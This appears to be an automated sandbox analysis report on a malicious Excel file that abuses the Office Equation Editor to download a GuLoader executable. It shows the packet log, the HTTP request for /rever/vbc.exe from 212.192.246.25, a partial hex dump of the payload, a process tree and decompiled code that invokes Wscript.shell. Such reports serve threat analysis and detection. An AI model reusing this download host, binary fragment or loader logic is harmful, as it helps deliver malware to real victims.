        Sep 14, 2021 21:51:37.568463087 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.568480015 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.568483114 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.568499088 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.568500042 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.568517923 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.568519115 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.568533897 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.568537951 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.568550110 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.568552971 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.568569899 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.568578959 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.568582058 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.568598032 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.568602085 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.568614006 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.568620920 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.568641901 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.569489002 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.597373009 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.597407103 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.597466946 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.597750902 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.597769976 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.597784042 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.597819090 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.597847939 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.597862959 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.597882032 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.597898960 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.597910881 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.597917080 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.597924948 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.597937107 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.597943068 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.597954988 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.597963095 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.597973108 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.597979069 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.597991943 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.597996950 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.598011971 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.598016024 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.598031998 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.598050117 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.598061085 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.598062992 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.598067045 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.598076105 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.598086119 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.598093987 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.598094940 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.598108053 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.598145008 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.598159075 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.598176003 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.598193884 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.598211050 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.598232985 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.598251104 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.598265886 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.598268032 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.598277092 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.598279953 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.598283052 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.598284006 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.598287106 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.598289967 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.598293066 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.598295927 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.598299026 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.598300934 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.598301888 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.598315954 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.598320007 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.598331928 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.598336935 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.598349094 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.598354101 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.598366976 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.598367929 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.598381996 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.598387003 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.598395109 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.598403931 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.598416090 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.598421097 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.598434925 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.598438025 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.598453999 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.598457098 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.598469973 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.598474979 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.598485947 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.598491907 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.598503113 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.598504066 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.598524094 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.598543882 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.599036932 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:38.109549999 CEST    49165        80         192.168.2.22    212.192.246.25

        HTTP Request Dependency Graph

        • 212.192.246.25

        HTTP Packets

        Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
        0           192.168.2.22  49165        212.192.246.25  80                C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

        Timestamp                             kBytes transferred  Direction  Data
        Sep 14, 2021 21:51:37.438657045 CEST  0                   OUT        GET /rever/vbc.exe HTTP/1.1
        Accept: */*
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
        Host: 212.192.246.25
        Connection: Keep-Alive
        Sep 14, 2021 21:51:37.473706961 CEST  1                   IN         HTTP/1.1 200 OK
        Date: Tue, 14 Sep 2021 19:51:37 GMT
        Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29
        Last-Modified: Mon, 13 Sep 2021 23:18:39 GMT
        ETag: "21000-5cbe8af7096b4"
        Accept-Ranges: bytes
        Content-Length: 135168
        Keep-Alive: timeout=5, max=100
        Connection: Keep-Alive
        Content-Type: application/x-msdownload
        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d7 36 a4 c9 93 57 ca 9a 93 57 ca 9a 93 57 ca 9a 10 4b c4 9a 92 57 ca 9a dc 75 c3 9a 9a 57 ca 9a a5 71 c7 9a 92 57 ca 9a 52 69 63 68 93 57 ca 9a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 89 db 56 56 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 b0 01 00 00 90 00 00 00 00 00 00 70 13 00 00 00 10 00 00 00 c0 01 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 50 02 00 00 10 00 00 b5 a3 02 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 b9 01 00 28 00 00 00 00 10 02 00 22 3b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 02 00 00 20 00 00 00 00 10 00 00 24 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 ad 01 00 00 10 00 00 00 b0 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 64 45 00 00 00 c0 01 00 00 10 00 00 00 c0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 22 3b 00 00 00 10 02 00 00 40 00 00 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$6WWWKWuWqWRichWPELVVp@P$(";8 $.text `.datadE@.rsrc";@@@IMSVBVM60.DLL
        Sep 14, 2021 21:51:37.473750114 CEST  3                   IN         Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        Data Ascii:
        Sep 14, 2021 21:51:37.473776102 CEST  4                   IN         Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        Data Ascii:
        Sep 14, 2021 21:51:37.473799944 CEST  5                   IN         Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        Data Ascii:
        Sep 14, 2021 21:51:37.505139112 CEST  7                   IN         Data Raw: 00 00 00 00 01 00 00 00 00 00 00 00 00 00 53 59 4e 43 45 50 48 41 4c 55 53 00 00 00 00 00 00 00 00 00 ff cc 31 00 07 77 ef cf a5 5b 2d f3 46 a1 48 0f 53 48 b8 2f 76 d0 80 eb 61 28 2f 59 4b 80 2e 67 ad b2 b8 df 8f 3a 4f ad 33 99 66 cf 11 b7 0c 00
        Data Ascii: SYNCEPHALUS1w[-FHSH/va(/YK.g:O3f``BPIGWIDGEONFALLESB$FALLES5DFList1x*Check3POR
        Sep 14, 2021 21:51:37.505177975 CEST  8                   IN         Data Raw: 00 00 00 00 10 19 40 00 01 00 00 00 18 19 40 00 00 00 00 00 14 19 40 00 01 00 00 00 18 19 40 00 00 00 b7 01 68 00 6c 00 40 19 40 00 3c e9 41 00 00 00 00 00 5c 1f 80 00 ac 32 40 00 bc 32 40 00 40 00 1f 00 34 00 00 00 a4 2d 40 00 ff ff ff ff 00 00
        Data Ascii: @@@@hl@@<A\2@2@@4-@@@u|-@@@X@^@d@
        Sep 14, 2021 21:51:37.505202055 CEST  10                  IN         Data Raw: 40 00 ff ff ff ff 00 00 00 00 00 00 00 00 30 1e 40 00 c0 75 7c 00 b4 2d 40 00 ff ff ff ff 00 00 00 00 08 1e 40 00 88 1d 40 00 58 13 40 00 5e 13 40 00 64 13 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        Data Ascii: @0@u|-@@@X@^@d@8*@A+@Ab~<@\3@
        Sep 14, 2021 21:51:37.505224943 CEST  11                  IN         Data Raw: 00 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b1 00 00 00 00 00 00 00 c8 36 40 00 3c 01 00 00 50 00 00 00 77 21 e3 14 d1 da 02 4f b5 c7 b7 2a ae 53 87 f1 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        Data Ascii: 6@<Pw!O*S4@Pit@P$lX08@P NW)7Af;$N
        Sep 14, 2021 21:51:37.505254984 CEST  13                  IN         Data Raw: 40 00 58 13 40 00 5e 13 40 00 64 13 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 26 40 00 0c 25 40 00 58 13 40 00
        Data Ascii: @X@^@d@T&@%@X@^@d@|&@%@X@^@d@
        Sep 14, 2021 21:51:37.505284071 CEST  14                  IN         Data Raw: 99 66 cf 11 b7 0c 00 aa 00 60 d3 93 4c 69 73 74 31 00 00 00 46 72 61 6d 65 33 00 00 fa 4e ad 33 99 66 cf 11 b7 0c 00 aa 00 60 d3 93 43 68 65 63 6b 31 00 00 43 68 65 63 6b 32 00 00 43 68 65 63 6b 33 00 00 55 6e 70 6c 69 61 62 69 6c 69 74 79 00 00
        Data Ascii: f`List1Frame3N3f`Check1Check2Check3UnpliabilityCHAIRMANNINGdommerkomiteers\Wscript.shell4:4:4#=h8+3q"=h8+3qp.@.@yO3f`
        Sep 14, 2021 21:51:37.505306959 CEST  15                  IN         Data Raw: 87 f1 c9 27 1f f6 5f bf 56 44 bf ca b8 b1 4c 82 c2 96 90 37 7d 59 a8 98 0f 47 9e e9 1d d5 83 e3 aa 36 58 69 08 46 76 c4 5a 40 b1 f4 87 1c 87 64 85 25 e8 85 bc 69 74 c5 a3 40 91 b4 50 24 9c 6c 85 58 61 35 b9 65 ac 37 c1 45 84 48 af bd 37 1e 69 b1
        Data Ascii: '_VDL7}YG6XiFvZ@d%it@P$lXa5e7EH7if`EZ}WDLx d NW)7Af;$NiHudYAB?JzT WLT'{`"HLmP;EGQK/XJK^W|FU7g@


        Code Manipulations

        Statistics

        CPU Usage

        Memory Usage

        High Level Behavior Distribution

        Behavior

        System Behavior

        General

        Start time:21:50:25
        Start date:14/09/2021
        Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        Wow64 process (32bit):false
        Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
        Imagebase:0x13ff60000
        File size:28253536 bytes
        MD5 hash:D53B85E21886D2AF9815C377537BCAC3
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:moderate

        General

        Start time:21:50:47
        Start date:14/09/2021
        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
        Wow64 process (32bit):true
        Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
        Imagebase:0x400000
        File size:543304 bytes
        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high

        General

        Start time:21:50:48
        Start date:14/09/2021
        Path:C:\Users\Public\vbc.exe
        Wow64 process (32bit):true
        Commandline:'C:\Users\Public\vbc.exe'
        Imagebase:0x400000
        File size:135168 bytes
        MD5 hash:ED004FE1AA9F4FA169A05B6716C03484
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:Visual Basic
        Yara matches:
        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Author: Joe Security
        Antivirus matches:
        • Detection: 100%, Joe Sandbox ML
        Reputation:low

        Disassembly

        Code Analysis

          Executed Functions

          APIs
          • NtAllocateVirtualMemory.NTDLL ref: 00456D94
          Strings
          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID: AllocateMemoryVirtual
          • String ID: <t$
          • API String ID: 2167126740-3814652957
          • Opcode ID: 6ed76021d63f8da709a28c4d061a04db0be46088974cf227e8a5c1eb94c1ad2f
          • Instruction ID: e2050265b1806d34f800cb187a0b26dcbb8ce97cb7ee3084623cf3274b2b844d
          • Opcode Fuzzy Hash: 6ed76021d63f8da709a28c4d061a04db0be46088974cf227e8a5c1eb94c1ad2f
          • Instruction Fuzzy Hash: 0C519A7A6012854FE7708F68DC813CF7BAABF59389F155129DC0C9B353E2328E4A8781
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • NtAllocateVirtualMemory.NTDLL ref: 00456D94
          Strings
          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID: AllocateMemoryVirtual
          • String ID: <t$
          • API String ID: 2167126740-3814652957
          • Opcode ID: 415d50d6abfa2468c8b2e2efb81405e5b27dd780eaed8b34ad4d1dc42307c2eb
          • Instruction ID: 49e1ed7d684e7bce45259f3d7f54453b2c563067d25eddff3104caff92974108
          • Opcode Fuzzy Hash: 415d50d6abfa2468c8b2e2efb81405e5b27dd780eaed8b34ad4d1dc42307c2eb
          • Instruction Fuzzy Hash: D351767A6002898FD7708F68CC813DF77A9BF19345F51412AEC0CAB302E7358E4A8B85
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • NtAllocateVirtualMemory.NTDLL ref: 00456D94
          Strings
          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID: AllocateMemoryVirtual
          • String ID: <t$
          • API String ID: 2167126740-3814652957
          • Opcode ID: 40edbc168e292eabe8522d0a67279d58fb9e2c217d95d0c2a18844b5afc05052
          • Instruction ID: 0d1f1952c21fec76691df30ffb06c95595eac78c9647e515423e3ef228efa12a
          • Opcode Fuzzy Hash: 40edbc168e292eabe8522d0a67279d58fb9e2c217d95d0c2a18844b5afc05052
          • Instruction Fuzzy Hash: C351757A6043858FD7708F68DC813DF7BA9BF19345F15412ADC0C9B342E7358A4A8B86
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • NtAllocateVirtualMemory.NTDLL ref: 00456D94
          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID: AllocateMemoryVirtual
          • String ID:
          • API String ID: 2167126740-0
          • Opcode ID: 69ef1c56d5a19c6c91d5e361bea0cb695e975d766e896bfb5ce08bc9e439ef44
          • Instruction ID: 3e903d3424b81ca278df359a1d9127ff9f8f6aa16863a5e61d6f0d865e64cf90
          • Opcode Fuzzy Hash: 69ef1c56d5a19c6c91d5e361bea0cb695e975d766e896bfb5ce08bc9e439ef44
          • Instruction Fuzzy Hash: F151787A6012C54FE7708F68DC813CF7BA9BB5A349F155229DC0C9B353E2328E4A8781
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • NtAllocateVirtualMemory.NTDLL ref: 00456D94
          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID: AllocateMemoryVirtual
          • String ID:
          • API String ID: 2167126740-0
          • Opcode ID: 8a2eb3db101ce4883cd149cddf60aafaeafc522444c58025d7aa33357dd75c10
          • Instruction ID: 6efff53e7c04e481542f2d8644da9e6a5f7e89474b88ff0c2fb9d76fcd73a9fd
          • Opcode Fuzzy Hash: 8a2eb3db101ce4883cd149cddf60aafaeafc522444c58025d7aa33357dd75c10
          • Instruction Fuzzy Hash: 06416B3A6012914FD7254FA8DC512CF7BA9BF5A349F15A12ADC089F313E2328E4A87C5
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 66%
          			E00419524(void* __ebx, void* __edi, void* __esi, long long __fp0, signed int _a4) {
          				signed int _v8;
          				intOrPtr _v12;
          				intOrPtr _v16;
          				intOrPtr _v28;
          				signed int _v32;
          				char _v36;
          				intOrPtr* _v48;
          				char _v52;
          				char _v56;
          				signed int _v60;
          				intOrPtr _v64;
          				intOrPtr _v68;
          				signed int _v72;
          				short _v80;
          				signed int _v84;
          				char _v100;
          				signed int _t66;
          				intOrPtr _t68;
          				char* _t75;
          				signed int _t79;
          				char* _t81;
          				char* _t82;
          				void* _t83;
          				void* _t89;
          				void* _t90;
          				void* _t91;
          				void* _t93;
          				void* _t94;
          				void* _t96;
          				intOrPtr _t97;
          				intOrPtr _t98;
          				long long _t104;
          
          				_t104 = __fp0;
          				_t90 = __esi;
          				_t89 = __edi;
          				_t83 = __ebx;
          				_t94 = _t96;
          				_t97 = _t96 - 0xc;
          				 *[fs:0x0] = _t97;
          				L004011C0();
          				_v16 = _t97;
          				_v12 = 0x401130;
          				_v8 = _a4 & 0x00000001;
          				_a4 = _a4 & 0xfffffffe;
          				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x3c,  *[fs:0x0], 0x4011c6, _t93);
          				_t66 =  *((intOrPtr*)( *_a4 + 0x2b4))(_a4);
          				asm("fclex");
          				_v60 = _t66;
          				if(_v60 >= 0) {
          					_v72 = _v72 & 0x00000000;
          				} else {
          					_push(0x2b4);
          					_push(0x402cc8);
          					_push(_a4);
          					_push(_v60);
          					L00401352();
          					_v72 = _t66;
          				}
          				_v32 = 0x30bc37c;
          				asm("fild dword [ebp-0x1c]");
          				_v80 = _t104;
          				if( *0x41c000 != 0) {
          					_push( *0x40112c);
          					_push( *0x401128);
          					L004011E4();
          				}
          				L0040134C();
          				_v32 = _t66;
          				while(1) {
          					_t68 = _v28 + 1;
          					if(_t68 < 0) {
          						break;
          					}
          					_v28 = _t68;
          					_t79 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4,  &_v56);
          					_v60 = _t79;
          					if(_v60 >= 0) {
          						_v84 = _v84 & 0x00000000;
          					} else {
          						_push(0x6f8);
          						_push(0x402cf8);
          						_push(_a4);
          						_push(_v60);
          						L00401352();
          						_v84 = _t79;
          					}
          					if(_v28 >= 0x1e8480) {
          						_push(0);
          						_push(L"Wscript.shell");
          						_push( &_v52); // executed
          						L0040133A(); // executed
          						_t81 =  &_v52;
          						_push(_t81);
          						L00401340();
          						_push(_t81);
          						_t82 =  &_v36;
          						_push(_t82);
          						L00401346();
          						L00401334();
          						_v32 = 0xc0177;
          						_t91 = 0;
          						do {
          							_t91 = _t91 + 1;
          						} while (_t91 != 0x36fe7d);
          						_push(_t83);
          						_push(_t82);
          						_push(_t91 + 0x9fc78);
          						return _t82;
          					} else {
          						continue;
          					}
          					L18:
          				}
          				L00401328();
          				_t98 = _t97 - 0xc;
          				 *[fs:0x0] = _t98;
          				L004011C0();
          				_v68 = _t98;
          				_v64 = 0x401140;
          				_v60 = 0;
          				 *((intOrPtr*)( *_v48 + 4))(_v48, _t89, _t90, _t83, 0x20,  *[fs:0x0], 0x4011c6, _t94);
          				_push(L"4:4:4");
          				_push( &_v100); // executed
          				L00401316(); // executed
          				_t75 =  &_v100;
          				_push(_t75);
          				L0040131C();
          				L00401322();
          				L00401334();
          				_v80 = 0x321d;
          				_push(0x419732);
          				L00401310();
          				return _t75;
          				goto L18;
          			}

          APIs
          • __vbaChkstk.MSVBVM60(?,004011C6), ref: 00419540
          • __vbaHresultCheckObj.MSVBVM60(00000000,00401130,00402CC8,000002B4), ref: 00419598
          • _adj_fdiv_m64.MSVBVM60 ref: 004195D3
          • __vbaFpI4.MSVBVM60 ref: 004195D8
          • __vbaHresultCheckObj.MSVBVM60(00000000,00401130,00402CF8,000006F8), ref: 0041961A
